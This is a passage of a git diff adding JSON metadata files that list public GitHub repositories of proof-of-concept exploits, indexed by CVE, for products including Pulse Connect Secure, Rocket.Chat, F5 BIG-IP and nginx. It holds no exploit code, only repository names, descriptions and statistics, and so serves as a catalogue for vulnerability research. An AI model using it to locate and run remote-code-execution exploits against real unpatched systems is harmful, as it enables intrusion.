"https:\/\/github.com\/ZephrFish\/CVE-2021-22893_HoneyPoC2", + "description": "DO NOT RUN THIS.", + "fork": false, + "created_at": "2021-04-21T09:48:57Z", + "updated_at": "2024-08-12T20:12:21Z", + "pushed_at": "2021-10-20T01:14:45Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 47, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 360122143, + "name": "CVE-2021-22893", + "full_name": "Mad-robot\/CVE-2021-22893", + "owner": { + "login": "Mad-robot", + "id": 25719480, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25719480?v=4", + "html_url": "https:\/\/github.com\/Mad-robot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mad-robot\/CVE-2021-22893", + "description": "Pulse Connect Secure RCE Vulnerability (CVE-2021-22893)", + "fork": false, + "created_at": "2021-04-21T10:09:56Z", + "updated_at": "2022-11-09T18:11:59Z", + "pushed_at": "2021-04-21T10:12:51Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 413204436, + "name": "CVE-2021-22893", + "full_name": "orangmuda\/CVE-2021-22893", + "owner": { + "login": "orangmuda", + "id": 91846073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4", + "html_url": "https:\/\/github.com\/orangmuda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-22893", + "description": "Proof On Concept — Pulse Secure CVE-2021-22893", + "fork": false, + "created_at": "2021-10-03T21:46:58Z", + "updated_at": "2024-08-12T20:16:56Z", + "pushed_at": "2022-02-24T22:56:29Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bash", + "bugbounty", + "code-injection" + ], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22911.json b/2021/CVE-2021-22911.json new file mode 100644 index 0000000000..414dcd55ae --- /dev/null +++ b/2021/CVE-2021-22911.json @@ -0,0 +1,219 @@ +[ + { + "id": 374143127, + "name": "CVE-2021-22911", + "full_name": "CsEnox\/CVE-2021-22911", + "owner": { + "login": "CsEnox", + "id": 60170196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60170196?v=4", + "html_url": "https:\/\/github.com\/CsEnox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CsEnox\/CVE-2021-22911", + "description": "Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1", + "fork": false, + "created_at": "2021-06-05T15:05:01Z", + "updated_at": "2024-11-25T06:21:43Z", + "pushed_at": "2023-06-11T08:47:04Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 56, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 391193611, + "name": "Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911", + "full_name": "optionalCTF\/Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911", + "owner": { + "login": "optionalCTF", + "id": 45684709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45684709?v=4", + "html_url": "https:\/\/github.com\/optionalCTF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/optionalCTF\/Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911", + "description": "Full unauthenticated RCE proof of concept for Rocket.Chat 3.12.1 CVE-2021-22911", + "fork": false, + "created_at": "2021-07-30T21:44:18Z", + "updated_at": "2024-04-08T12:45:11Z", + "pushed_at": "2021-07-30T22:00:52Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 408111498, + "name": "CVE-2021-22911", + "full_name": "jayngng\/CVE-2021-22911", + "owner": { + "login": "jayngng", + "id": 72692401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72692401?v=4", + "html_url": "https:\/\/github.com\/jayngng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jayngng\/CVE-2021-22911", + "description": "Modifed ver of the original exploit to save some times on password reseting for unprivileged user", + "fork": false, + "created_at": "2021-09-19T11:43:06Z", + "updated_at": "2021-09-19T11:48:51Z", + "pushed_at": "2021-09-19T11:48:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 622121979, + "name": "CVE-2021-22911-rust", + "full_name": "ChrisPritchard\/CVE-2021-22911-rust", + "owner": { + "login": "ChrisPritchard", + "id": 30073148, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30073148?v=4", + "html_url": "https:\/\/github.com\/ChrisPritchard", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ChrisPritchard\/CVE-2021-22911-rust", + "description": "exploit for CVE-2021-22911 in rust", + "fork": false, + "created_at": "2023-04-01T07:19:54Z", + "updated_at": "2023-04-02T21:52:40Z", + "pushed_at": "2023-04-01T21:52:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 649901931, + "name": "CVE-2021-22911", + "full_name": "MrDottt\/CVE-2021-22911", + "owner": { + "login": "MrDottt", + "id": 50643409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50643409?v=4", + "html_url": "https:\/\/github.com\/MrDottt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrDottt\/CVE-2021-22911", + "description": null, + "fork": false, + "created_at": "2023-06-05T22:26:26Z", + "updated_at": "2023-06-05T22:28:04Z", + "pushed_at": "2023-06-05T22:28:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 655936339, + "name": "CVE-2021-22911", + "full_name": "overgrowncarrot1\/CVE-2021-22911", + "owner": { + "login": "overgrowncarrot1", + "id": 78485709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78485709?v=4", + "html_url": "https:\/\/github.com\/overgrowncarrot1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/overgrowncarrot1\/CVE-2021-22911", + "description": null, + "fork": false, + "created_at": "2023-06-19T23:56:09Z", + "updated_at": "2023-06-19T23:56:42Z", + "pushed_at": "2023-06-19T23:58:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 880910985, + "name": "CVE-2021-22911-EXP", + "full_name": "Weisant\/CVE-2021-22911-EXP", + "owner": { + "login": "Weisant", + "id": 100367409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100367409?v=4", + "html_url": "https:\/\/github.com\/Weisant", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Weisant\/CVE-2021-22911-EXP", + "description": "some small changes to the code by CsEnox", + "fork": false, + "created_at": "2024-10-30T15:30:08Z", + "updated_at": "2024-10-30T15:44:11Z", + "pushed_at": "2024-10-30T15:37:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22924.json b/2021/CVE-2021-22924.json new file mode 100644 index 0000000000..4ec2a13c14 --- /dev/null +++ b/2021/CVE-2021-22924.json @@ -0,0 +1,33 @@ +[ + { + "id": 487173629, + "name": "external_curl_AOSP10_r33_CVE-2021-22924", + "full_name": "Trinadh465\/external_curl_AOSP10_r33_CVE-2021-22924", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_curl_AOSP10_r33_CVE-2021-22924", + "description": null, + "fork": false, + "created_at": "2022-04-30T03:40:15Z", + "updated_at": "2023-03-21T01:13:01Z", + "pushed_at": "2022-04-30T03:42:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22941.json b/2021/CVE-2021-22941.json new file mode 100644 index 0000000000..af92f321df --- /dev/null +++ b/2021/CVE-2021-22941.json @@ -0,0 +1,33 @@ +[ + { + "id": 416379571, + "name": "CVE-2021-22941", + "full_name": "hoavt184\/CVE-2021-22941", + "owner": { + "login": "hoavt184", + "id": 68089551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68089551?v=4", + "html_url": "https:\/\/github.com\/hoavt184", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hoavt184\/CVE-2021-22941", + "description": null, + "fork": false, + "created_at": "2021-10-12T14:52:38Z", + "updated_at": "2024-11-21T13:20:10Z", + "pushed_at": "2021-10-12T16:05:19Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-22986.json b/2021/CVE-2021-22986.json new file mode 100644 index 0000000000..7ecdc77e5a --- /dev/null +++ b/2021/CVE-2021-22986.json @@ -0,0 +1,472 @@ +[ + { + "id": 348585275, + "name": "CVE-2021-22986-Poc", + "full_name": "dorkerdevil\/CVE-2021-22986-Poc", + "owner": { + "login": "dorkerdevil", + "id": 15796745, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4", + "html_url": "https:\/\/github.com\/dorkerdevil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2021-22986-Poc", + "description": "This is a Poc for BIGIP iControl unauth RCE ", + "fork": false, + "created_at": "2021-03-17T05:02:45Z", + "updated_at": "2024-08-12T20:11:16Z", + "pushed_at": "2021-03-17T05:10:03Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 49, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 349525234, + "name": "f5_rce_poc", + "full_name": "S1xHcL\/f5_rce_poc", + "owner": { + "login": "S1xHcL", + "id": 47764705, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47764705?v=4", + "html_url": "https:\/\/github.com\/S1xHcL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/S1xHcL\/f5_rce_poc", + "description": "cve-2021-22986 f5 rce 漏洞批量检测 poc", + "fork": false, + "created_at": "2021-03-19T18:50:22Z", + "updated_at": "2024-08-12T20:11:21Z", + "pushed_at": "2021-03-27T10:02:59Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 27, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 349660227, + "name": "westone-CVE-2021-22986-scanner", + "full_name": "Osyanina\/westone-CVE-2021-22986-scanner", + "owner": { + "login": "Osyanina", + "id": 78467376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4", + "html_url": "https:\/\/github.com\/Osyanina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2021-22986-scanner", + "description": "A vulnerability scanner that detects CVE-2021-22986 vulnerabilities.", + "fork": false, + "created_at": "2021-03-20T07:45:38Z", + "updated_at": "2021-03-20T07:46:00Z", + "pushed_at": "2021-03-21T03:39:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 349930753, + "name": "F5_RCE", + "full_name": "safesword\/F5_RCE", + "owner": { + "login": "safesword", + "id": 79968310, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79968310?v=4", + "html_url": "https:\/\/github.com\/safesword", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safesword\/F5_RCE", + "description": "CVE-2021-22986 F5 BIG-IP iControl 命令执行漏洞", + "fork": false, + "created_at": "2021-03-21T07:40:51Z", + "updated_at": "2022-08-13T08:25:58Z", + "pushed_at": "2021-03-21T07:40:59Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-22986" + ], + "visibility": "public", + "forks": 5, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 350185065, + "name": "CVE-2021-22986", + "full_name": "microvorld\/CVE-2021-22986", + "owner": { + "login": "microvorld", + "id": 30143943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30143943?v=4", + "html_url": "https:\/\/github.com\/microvorld", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/microvorld\/CVE-2021-22986", + "description": "F5 BIG-IP\/BIG-IQ iControl Rest API SSRF to RCE", + "fork": false, + "created_at": "2021-03-22T02:46:33Z", + "updated_at": "2021-03-22T02:46:33Z", + "pushed_at": "2021-03-21T17:10:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 350243656, + "name": "CVE-2021-22986", + "full_name": "Al1ex\/CVE-2021-22986", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-22986", + "description": "CVE-2021-22986 & F5 BIG-IP RCE", + "fork": false, + "created_at": "2021-03-22T07:13:50Z", + "updated_at": "2024-11-23T01:54:42Z", + "pushed_at": "2021-04-03T12:56:37Z", + "stargazers_count": 88, + "watchers_count": 88, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-22986", + "f5-bigip" + ], + "visibility": "public", + "forks": 33, + "watchers": 88, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 350261633, + "name": "CVE-2021-22986", + "full_name": "kiri-48\/CVE-2021-22986", + "owner": { + "login": "kiri-48", + "id": 43057210, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43057210?v=4", + "html_url": "https:\/\/github.com\/kiri-48", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kiri-48\/CVE-2021-22986", + "description": null, + "fork": false, + "created_at": "2021-03-22T08:19:11Z", + "updated_at": "2023-06-01T09:18:39Z", + "pushed_at": "2021-03-22T08:32:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 350550235, + "name": "CVE-2021-22986_Check", + "full_name": "ZephrFish\/CVE-2021-22986_Check", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2021-22986_Check", + "description": "CVE-2021-22986 Checker Script in Python3", + "fork": false, + "created_at": "2021-03-23T02:04:39Z", + "updated_at": "2024-08-12T20:11:27Z", + "pushed_at": "2021-03-23T02:07:30Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 351650917, + "name": "CVE-202122986-EXP", + "full_name": "yaunsky\/CVE-202122986-EXP", + "owner": { + "login": "yaunsky", + "id": 48243087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48243087?v=4", + "html_url": "https:\/\/github.com\/yaunsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yaunsky\/CVE-202122986-EXP", + "description": "F5 BIG-IP远程代码执行;cve-2021-22986,批量检测;命令执行利用", + "fork": false, + "created_at": "2021-03-26T03:32:06Z", + "updated_at": "2024-08-12T20:11:33Z", + "pushed_at": "2021-03-26T05:09:54Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 352531717, + "name": "CVE-2021-22986", + "full_name": "Tas9er\/CVE-2021-22986", + "owner": { + "login": "Tas9er", + "id": 57090266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57090266?v=4", + "html_url": "https:\/\/github.com\/Tas9er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tas9er\/CVE-2021-22986", + "description": "Code By:Tas9er \/ F5 BIG-IP 远程命令执行漏洞", + "fork": false, + "created_at": "2021-03-29T05:56:21Z", + "updated_at": "2024-08-12T20:11:39Z", + "pushed_at": "2021-03-29T05:58:51Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 352644816, + "name": "CVE-2021-22986", + "full_name": "dotslashed\/CVE-2021-22986", + "owner": { + "login": "dotslashed", + "id": 73475291, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73475291?v=4", + "html_url": "https:\/\/github.com\/dotslashed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dotslashed\/CVE-2021-22986", + "description": null, + "fork": false, + "created_at": "2021-03-29T13:01:08Z", + "updated_at": "2021-03-29T13:04:49Z", + "pushed_at": "2021-03-29T13:04:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476541451, + "name": "CVE-2021-22986", + "full_name": "DDestinys\/CVE-2021-22986", + "owner": { + "login": "DDestinys", + "id": 73631761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73631761?v=4", + "html_url": "https:\/\/github.com\/DDestinys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DDestinys\/CVE-2021-22986", + "description": "BIGIP F5", + "fork": false, + "created_at": "2022-04-01T02:02:33Z", + "updated_at": "2022-04-01T02:03:21Z", + "pushed_at": "2022-04-01T02:03:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 497326298, + "name": "F5-BIG-IP-POC", + "full_name": "west9b\/F5-BIG-IP-POC", + "owner": { + "login": "west9b", + "id": 103512651, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103512651?v=4", + "html_url": "https:\/\/github.com\/west9b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/west9b\/F5-BIG-IP-POC", + "description": "CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合", + "fork": false, + "created_at": "2022-05-28T13:30:22Z", + "updated_at": "2023-09-13T08:48:13Z", + "pushed_at": "2022-07-30T00:16:29Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 598562860, + "name": "CVE-2021-22986", + "full_name": "amitlttwo\/CVE-2021-22986", + "owner": { + "login": "amitlttwo", + "id": 55759090, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55759090?v=4", + "html_url": "https:\/\/github.com\/amitlttwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amitlttwo\/CVE-2021-22986", + "description": null, + "fork": false, + "created_at": "2023-02-07T11:19:20Z", + "updated_at": "2023-02-07T11:27:49Z", + "pushed_at": "2023-02-07T11:32:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736466953, + "name": "CVE-2021-22986", + "full_name": "huydung26\/CVE-2021-22986", + "owner": { + "login": "huydung26", + "id": 78777301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78777301?v=4", + "html_url": "https:\/\/github.com\/huydung26", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huydung26\/CVE-2021-22986", + "description": "Custom POC of CVE-2021-22986 by Al1ex@Heptagram", + "fork": false, + "created_at": "2023-12-28T01:49:24Z", + "updated_at": "2023-12-28T01:50:07Z", + "pushed_at": "2023-12-28T01:50:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-23017.json b/2021/CVE-2021-23017.json new file mode 100644 index 0000000000..3cb0abbba1 --- /dev/null +++ b/2021/CVE-2021-23017.json @@ -0,0 +1,129 @@ +[ + { + "id": 439285309, + "name": "nginx-patch", + "full_name": "niandy\/nginx-patch", + "owner": { + "login": "niandy", + "id": 8412769, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8412769?v=4", + "html_url": "https:\/\/github.com\/niandy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/niandy\/nginx-patch", + "description": "nginx 1.15.10 patch against cve-2021-23017 (ingress version)", + "fork": false, + "created_at": "2021-12-17T09:53:39Z", + "updated_at": "2021-12-22T08:15:05Z", + "pushed_at": "2021-12-17T11:53:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 508934873, + "name": "CVE-2021-23017-PoC", + "full_name": "M507\/CVE-2021-23017-PoC", + "owner": { + "login": "M507", + "id": 38591075, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38591075?v=4", + "html_url": "https:\/\/github.com\/M507", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M507\/CVE-2021-23017-PoC", + "description": "PoC for Nginx 0.6.18 - 1.20.0 Memory Overwrite Vulnerability CVE-2021-23017", + "fork": false, + "created_at": "2022-06-30T04:39:58Z", + "updated_at": "2024-11-09T09:01:23Z", + "pushed_at": "2023-11-12T16:29:03Z", + "stargazers_count": 99, + "watchers_count": 99, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "poc" + ], + "visibility": "public", + "forks": 21, + "watchers": 99, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 668565009, + "name": "CVE-2021-23017-PoC", + "full_name": "lakshit1212\/CVE-2021-23017-PoC", + "owner": { + "login": "lakshit1212", + "id": 140044978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140044978?v=4", + "html_url": "https:\/\/github.com\/lakshit1212", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lakshit1212\/CVE-2021-23017-PoC", + "description": null, + "fork": false, + "created_at": "2023-07-20T05:39:01Z", + "updated_at": "2023-08-22T23:46:40Z", + "pushed_at": "2023-07-20T05:43:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707950575, + "name": "CVE-2021-23017", + "full_name": "ShivamDey\/CVE-2021-23017", + "owner": { + "login": "ShivamDey", + "id": 87941867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87941867?v=4", + "html_url": "https:\/\/github.com\/ShivamDey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShivamDey\/CVE-2021-23017", + "description": null, + "fork": false, + "created_at": "2023-10-21T04:24:02Z", + "updated_at": "2023-10-21T04:25:17Z", + "pushed_at": "2023-10-21T04:25:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-2302.json b/2021/CVE-2021-2302.json new file mode 100644 index 0000000000..7c10b1a5ed --- /dev/null +++ b/2021/CVE-2021-2302.json @@ -0,0 +1,33 @@ +[ + { + "id": 407084740, + "name": "CVE-2021-2302", + "full_name": "quynhle7821\/CVE-2021-2302", + "owner": { + "login": "quynhle7821", + "id": 34308443, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34308443?v=4", + "html_url": "https:\/\/github.com\/quynhle7821", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/quynhle7821\/CVE-2021-2302", + "description": null, + "fork": false, + "created_at": "2021-09-16T08:27:30Z", + "updated_at": "2024-08-20T10:58:17Z", + "pushed_at": "2021-09-16T08:49:16Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-23132.json b/2021/CVE-2021-23132.json new file mode 100644 index 0000000000..d9b1d87ecb --- /dev/null +++ b/2021/CVE-2021-23132.json @@ -0,0 +1,33 @@ +[ + { + "id": 343973725, + "name": "CVE-2021-23132", + "full_name": "HoangKien1020\/CVE-2021-23132", + "owner": { + "login": "HoangKien1020", + "id": 24661746, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24661746?v=4", + "html_url": "https:\/\/github.com\/HoangKien1020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HoangKien1020\/CVE-2021-23132", + "description": "com_media allowed paths that are not intended for image uploads to RCE", + "fork": false, + "created_at": "2021-03-03T02:13:57Z", + "updated_at": "2024-08-13T20:15:35Z", + "pushed_at": "2021-03-03T03:52:10Z", + "stargazers_count": 71, + "watchers_count": 71, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 71, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-23358.json b/2021/CVE-2021-23358.json new file mode 100644 index 0000000000..cac4489fb0 --- /dev/null +++ b/2021/CVE-2021-23358.json @@ -0,0 +1,64 @@ +[ + { + "id": 606530843, + "name": "Detection-script-for-cve-2021-23358", + "full_name": 